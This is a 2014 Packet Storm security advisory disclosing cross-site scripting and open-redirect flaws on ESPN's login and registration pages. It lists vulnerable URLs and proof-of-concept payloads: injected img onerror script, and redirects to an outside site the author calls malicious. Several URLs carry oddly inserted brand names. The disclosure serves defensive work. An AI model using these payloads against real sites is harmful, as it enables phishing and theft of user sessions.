espn.go.com Cross Site Scripting / Open Redirect

2014-12-09T00:00:00
ID PACKETSTORM:129450
Type packetstorm
Reporter Jing Wang
Modified 2014-12-09T00:00:00

Description

                                        
                                            `*ESPN espn.go.com <http://espn.go.com/> Login & Register Page XSS and Dest  
Redirect Privilege Escalation Security Vulnerabilities*  
  
  
  
  
  
*Domain:*  
http://espn.go.com/  
  
  
*"*As of August 2013, ESPN is available to approximately 97,736,000 pay  
television households (85.58% of households with at least one television  
set) in the United States.[2]  
<http://en.wikipedia.org/wiki/ESPN#cite_note-2> In addition to the flagship  
channel and its seven related channels in the United States, ESPN  
broadcasts in more than 200 countries,[3]  
<http://en.wikipedia.org/wiki/ESPN#cite_note-ESPN_Inc-3> operating regional  
channels in Australia <http://en.wikipedia.org/wiki/Australia>, Brasil  
<http://en.wikipedia.org/wiki/Brasil>, Latin America  
<http://en.wikipedia.org/wiki/Latin_America> and the United Kingdom  
<http://en.wikipedia.org/wiki/United_Kingdom>, and owning a 20% interest in The  
Sports Network <http://en.wikipedia.org/wiki/The_Sports_Network> (TSN) as  
well as its five sister networks and NHL Network  
<http://en.wikipedia.org/wiki/NHL_Network_%28Canada%29> in Canada  
<http://en.wikipedia.org/wiki/Canada>." (Wikipedia)  
  
  
  
  
  
  
*Vulnerability description:*  
  
Espn.go.com <http://espn.go.com/> has a security problem. It is vulnerable  
to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open  
Redirect) attacks.  
  
  
Those vulnerabilities are very dangerous. Since they happen at ESPN's  
"login" & "register" pages that are credible. Attackers can abuse those  
links to mislead ESPN's users. The success rate of attacks may be high.  
  
During the tests, besides the links given above, large number of ESPN's  
links are vulnerable to those attacks.  
  
  
The vulnerability occurs at "espn.go.com"'s "login?" & "register" pages  
with "redirect" parameter, i.e.  
http://streak.espn.go.com/en/login?redirect=  
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com  
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=  
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/  
  
  
Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601)  
in Windows 8.  
  
  
  
  
  
  
*(1) XSS Vulnerability*  
  
*Vulnerable URLs:*  
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459  
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate  
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit  
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login  
  
  
*POC:*  
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459"><img  
src=x onerror=prompt('justqdjing')>  
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn"><img  
src=x onerror=prompt('justqdjing')>  
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate"><img  
src=x onerror=prompt('justqdjing')>  
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login"><img  
src=x onerror=prompt('justqdjing')>  
  
  
  
  
*Poc Video:*  
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be  
  
*Blog Detail:*  
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html  
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html>  
  
  
  
  
*(2) Dest Redirect Privilege Escalation Vulnerability*  
  
Use one of webpages for the following tests. The webpage address is "  
http://www.diebiyi.com/". Suppose that this webpage is malicious.  
  
  
*(2.1) Login Page ** Dest Redirect Privilege Escalation Vulnerability*  
  
*Vulnerable URL 1:*  
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial  
  
*POC:*  
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com  
  
  
*Vulnerable URL 2:*  
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828  
<http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828>  
  
*POC:*  
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com  
  
  
  
*(2.2) Vulnerabilities Attacked without User Login*  
  
*Vulnerable URL 1:*  
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112  
<http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112>  
  
*POC:*  
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com  
?  
  
  
  
This vulnerability was used to demonstrate "Covert Redirect" of Facebook,  
  
Poc Video:  
https://www.youtube.com/watch?v=HUE8VbbwUms  
  
Blog Detail:  
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/  
  
  
  
  
*Vulnerable URL 2:*  
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017  
<http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017>  
  
*POC:*  
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com  
  
  
  
  
  
*Vulnerable URL 3:*  
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289  
  
POC:  
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com  
  
  
  
  
  
*Poc Video:*  
https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be  
  
*Blog Detail:*  
http://securityrelated.blogspot.com/2014/12/espn-espn.html  
<http://securityrelated.blogspot.sg/2014/12/espn-espn.html>  
  
  
  
  
  
  
  
*(3) *Those security problems were reported to ESPN in early May. However,  
they are still unpatched.  
  
  
  
  
  
  
  
Reported by:  
Wang Jing, School of Physical and Mathematical Sciences, Nanyang  
Technological University, Singapore.  
http://www.tetraph.com/wangjing/  
  
  
  
  
  
  
*Blog Details:*  
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss_9.html  
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html>  
  
  
`